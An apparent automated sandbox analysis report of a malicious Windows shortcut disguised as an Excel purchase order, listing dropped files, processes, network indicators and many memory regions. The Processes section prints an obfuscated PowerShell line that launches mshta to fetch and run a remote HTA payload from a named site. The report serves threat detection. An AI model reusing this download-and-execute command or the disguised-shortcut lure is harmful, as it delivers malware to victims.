Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
#U56de#U590d BULK ORDER PO#GDN-JL-OO-231227.xlsx.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=28,
ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
|
initial sample
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0xf8a450ab, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\error[1]
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\drip[1].hta
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\error[1]
|
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\warning[1]
|
GIF image data, version 89a, 36 x 38
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n15ex3eq.u54.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt5vs2ci.kot.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\29340ddd4f2d6b27.customDestinations-ms (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4U9PXHA85KL0OJETOERU.temp
|
data
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/drip.hta
|
||
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/drip.hta
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://www.sessosesso.it/assets/aw/drip.hta
|
89.46.106.29
|
||
https://www.sessosesso.it/assets/aw/drip.htaAC:
|
unknown
|
||
https://www.sessosesso.it/
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htadowsINetCache
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htahis
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htahttps://www.sessosesso.it/assets/aw/drip.hta
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.hta(e
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htapmwi
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htaq
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.hta7
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htaC:
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htapage.
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.hta...BA
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.hta=
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.hta4C
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htaROWSEo
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htaH
|
unknown
|
||
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htaK
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.hta...
|
unknown
|
||
https://www.sessosesso.it/)
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htaX
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.hta0?i
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htadows
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htaHu
|
unknown
|
||
https://www.sessosesso.it/assets/aw/drip.htaa
|
unknown
|
There are 18 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
www.sessosesso.it
|
89.46.106.29
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
89.46.106.29
|
www.sessosesso.it
|
Italy
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7DF4E0810000
|
trusted library allocation
|
page readonly
|
||
1C16973D000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C169855000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167E24000
|
heap
|
page read and write
|
||
10054E000
|
stack
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167E72000
|
heap
|
page read and write
|
||
1C167CA5000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167C94000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167C8C000
|
heap
|
page read and write
|
||
1994BC92000
|
heap
|
page read and write
|
||
1C169762000
|
heap
|
page read and write
|
||
1C169980000
|
trusted library allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C1697BF000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
19951380000
|
remote allocation
|
page read and write
|
||
360C17E000
|
unkown
|
page readonly
|
||
1C167200000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
360B07E000
|
unkown
|
page readonly
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C169963000
|
trusted library allocation
|
page read and write
|
||
360BA7E000
|
stack
|
page read and write
|
||
7DF4E0821000
|
trusted library allocation
|
page execute read
|
||
1B9654A4000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
360AF7C000
|
stack
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167E42000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C16969D000
|
trusted library allocation
|
page read and write
|
||
1994CBD0000
|
trusted library section
|
page readonly
|
||
1995144F000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CFD000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1994C390000
|
trusted library section
|
page read and write
|
||
1B9651E2000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1994CBE0000
|
trusted library section
|
page readonly
|
||
1C168160000
|
heap
|
page readonly
|
||
1C169848000
|
heap
|
page read and write
|
||
19951505000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
100E4E000
|
stack
|
page read and write
|
||
1C169940000
|
trusted library allocation
|
page read and write
|
||
1C167CC6000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1B966C76000
|
heap
|
page read and write
|
||
1C1699D4000
|
trusted library allocation
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
360B87E000
|
unkown
|
page readonly
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C1696B0000
|
trusted library allocation
|
page read and write
|
||
360B4FE000
|
stack
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167E2C000
|
heap
|
page read and write
|
||
1B965484000
|
heap
|
page read and write
|
||
1C167E58000
|
heap
|
page read and write
|
||
1C169699000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167D09000
|
heap
|
page read and write
|
||
1C169764000
|
heap
|
page read and write
|
||
1994CBB0000
|
trusted library section
|
page readonly
|
||
1C1671F8000
|
trusted library allocation
|
page read and write
|
||
19951461000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
360B8FE000
|
stack
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
199514F5000
|
heap
|
page read and write
|
||
1C167CF9000
|
heap
|
page read and write
|
||
1C167D0F000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
360B2FE000
|
stack
|
page read and write
|
||
1C167D03000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C1697B7000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CA3000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
199511D0000
|
trusted library allocation
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
19951140000
|
trusted library allocation
|
page read and write
|
||
360BD79000
|
stack
|
page read and write
|
||
1B966E30000
|
heap
|
page read and write
|
||
1B9654AE000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CA5000
|
heap
|
page read and write
|
||
7DF4E0801000
|
trusted library allocation
|
page execute read
|
||
1C167CA6000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167D21000
|
heap
|
page read and write
|
||
1C167EC8000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167D09000
|
heap
|
page read and write
|
||
1B965226000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
360B37E000
|
unkown
|
page readonly
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167E1C000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167D22000
|
heap
|
page read and write
|
||
1C167CFB000
|
heap
|
page read and write
|
||
1C168170000
|
trusted library allocation
|
page read and write
|
||
1994BCAD000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CE0000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1994C402000
|
heap
|
page read and write
|
||
360C27B000
|
stack
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C169970000
|
trusted library allocation
|
page read and write
|
||
199512B0000
|
trusted library allocation
|
page read and write
|
||
1C16970B000
|
trusted library allocation
|
page read and write
|
||
1C1697D9000
|
heap
|
page read and write
|
||
199512A0000
|
trusted library allocation
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
19951500000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C1671C0000
|
trusted library allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1995122E000
|
trusted library allocation
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C169858000
|
heap
|
page read and write
|
||
1B965274000
|
heap
|
page read and write
|
||
199514FB000
|
heap
|
page read and write
|
||
1994CBC0000
|
trusted library section
|
page readonly
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C1671E8000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C169853000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167D10000
|
heap
|
page read and write
|
||
1C16721C000
|
trusted library allocation
|
page read and write
|
||
100F9F000
|
stack
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C16975C000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167C81000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C1699D4000
|
trusted library allocation
|
page read and write
|
||
1C167E6D000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
199514C1000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF6000
|
heap
|
page read and write
|
||
19951200000
|
trusted library allocation
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1B9653E0000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1B9652B5000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1B9653D0000
|
heap
|
page read and write
|
||
360B47E000
|
unkown
|
page readonly
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C16DA42000
|
trusted library allocation
|
page read and write
|
||
1994BCA3000
|
heap
|
page read and write
|
||
1C1697D9000
|
heap
|
page read and write
|
||
1C16984B000
|
heap
|
page read and write
|
||
1C1696B5000
|
trusted library allocation
|
page read and write
|
||
1C169954000
|
trusted library allocation
|
page read and write
|
||
1994C380000
|
trusted library allocation
|
page read and write
|
||
1C1696CA000
|
trusted library allocation
|
page read and write
|
||
1C169920000
|
trusted library allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C169924000
|
trusted library allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
199514E1000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
10094A000
|
stack
|
page read and write
|
||
1C167E56000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
10129C000
|
trusted library allocation
|
page read and write
|
||
1C169853000
|
heap
|
page read and write
|
||
360C07B000
|
stack
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C1696B8000
|
trusted library allocation
|
page read and write
|
||
360B97E000
|
unkown
|
page readonly
|
||
1C16984B000
|
heap
|
page read and write
|
||
1994D111000
|
trusted library allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C169853000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C1697CA000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167DD0000
|
heap
|
page read and write
|
||
1995142E000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1994BC6D000
|
heap
|
page read and write
|
||
1C169708000
|
trusted library allocation
|
page read and write
|
||
1C169857000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167E2E000
|
heap
|
page read and write
|
||
19951400000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1994BC9D000
|
heap
|
page read and write
|
||
1C1696BE000
|
trusted library allocation
|
page read and write
|
||
1B966E3D000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C169760000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167D21000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
360B67D000
|
stack
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
360A877000
|
stack
|
page read and write
|
||
1C167DF0000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1994D140000
|
trusted library allocation
|
page read and write
|
||
1C16970D000
|
trusted library allocation
|
page read and write
|
||
1C16DE20000
|
trusted library allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C1697D7000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
19951421000
|
heap
|
page read and write
|
||
1C167D19000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1994C51A000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
19951320000
|
trusted library allocation
|
page read and write
|
||
1C16DED0000
|
trusted library allocation
|
page read and write
|
||
1C167228000
|
trusted library allocation
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167D10000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167D03000
|
heap
|
page read and write
|
||
1C16984B000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
360B57E000
|
unkown
|
page readonly
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1B966E34000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF9000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1B966C68000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167D2A000
|
heap
|
page read and write
|
||
199511B0000
|
trusted library allocation
|
page read and write
|
||
1C168140000
|
trusted library allocation
|
page execute
|
||
1C167D22000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1994C500000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C169954000
|
trusted library allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1B966C7A000
|
heap
|
page read and write
|
||
1C16720C000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C169928000
|
trusted library allocation
|
page read and write
|
||
1C16727C000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C169968000
|
trusted library allocation
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167E26000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167D09000
|
heap
|
page read and write
|
||
19951150000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167D09000
|
heap
|
page read and write
|
||
1994BC00000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167F00000
|
heap
|
page read and write
|
||
1C169948000
|
trusted library allocation
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
19951210000
|
trusted library allocation
|
page read and write
|
||
100E9F000
|
stack
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C1697D7000
|
heap
|
page read and write
|
||
1C1671F0000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C1697D2000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1B9651A0000
|
heap
|
page read and write
|
||
1994C400000
|
heap
|
page read and write
|
||
360A2CC000
|
stack
|
page read and write
|
||
1C167214000
|
trusted library allocation
|
page read and write
|
||
360B3FE000
|
stack
|
page read and write
|
||
199512A0000
|
trusted library allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
360BC7E000
|
unkown
|
page readonly
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167188000
|
trusted library allocation
|
page read and write
|
||
1B9653F0000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C16722C000
|
trusted library allocation
|
page read and write
|
||
1B9654A0000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
360BBFE000
|
stack
|
page read and write
|
||
1C167CEC000
|
heap
|
page read and write
|
||
1C16996C000
|
trusted library allocation
|
page read and write
|
||
1C1671B4000
|
trusted library allocation
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
360B7FE000
|
stack
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1994BC5B000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167E28000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
100A4F000
|
stack
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C16988C000
|
heap
|
page read and write
|
||
100D4F000
|
stack
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1994BBF0000
|
heap
|
page read and write
|
||
1C167D35000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167E18000
|
heap
|
page read and write
|
||
1C1671E0000
|
trusted library allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1B965170000
|
heap
|
page read and write
|
||
1C16DEC0000
|
trusted library allocation
|
page read and write
|
||
1C167DD0000
|
remote allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C16DEC3000
|
trusted library allocation
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C169948000
|
trusted library allocation
|
page read and write
|
||
1994BC6B000
|
heap
|
page read and write
|
||
1994C791000
|
trusted library allocation
|
page read and write
|
||
1C169970000
|
trusted library allocation
|
page read and write
|
||
1C167220000
|
trusted library allocation
|
page read and write
|
||
1C167D03000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF9000
|
heap
|
page read and write
|
||
199511F0000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167E14000
|
heap
|
page read and write
|
||
1C16996C000
|
trusted library allocation
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C16975E000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167198000
|
trusted library allocation
|
page read and write
|
||
1C167192000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1994BC68000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1994BC13000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
19951380000
|
remote allocation
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1B966C72000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
19951200000
|
trusted library allocation
|
page read and write
|
||
1C16DEB0000
|
trusted library allocation
|
page read and write
|
||
1C169731000
|
heap
|
page read and write
|
||
360A97E000
|
unkown
|
page readonly
|
||
1C167CF9000
|
heap
|
page read and write
|
||
1C1697C3000
|
heap
|
page read and write
|
||
199514CD000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167DD0000
|
remote allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
199514C3000
|
heap
|
page read and write
|
||
1C169963000
|
trusted library allocation
|
page read and write
|
||
1C169757000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C169944000
|
trusted library allocation
|
page read and write
|
||
1C1697DA000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
360AB7E000
|
stack
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1B965180000
|
heap
|
page read and write
|
||
1C169740000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1994BD29000
|
heap
|
page read and write
|
||
1C167DD0000
|
remote allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C169848000
|
heap
|
page read and write
|
||
1B965200000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1994BC63000
|
heap
|
page read and write
|
||
1994BCBB000
|
heap
|
page read and write
|
||
1994BD02000
|
heap
|
page read and write
|
||
1995150C000
|
heap
|
page read and write
|
||
1B9652C4000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
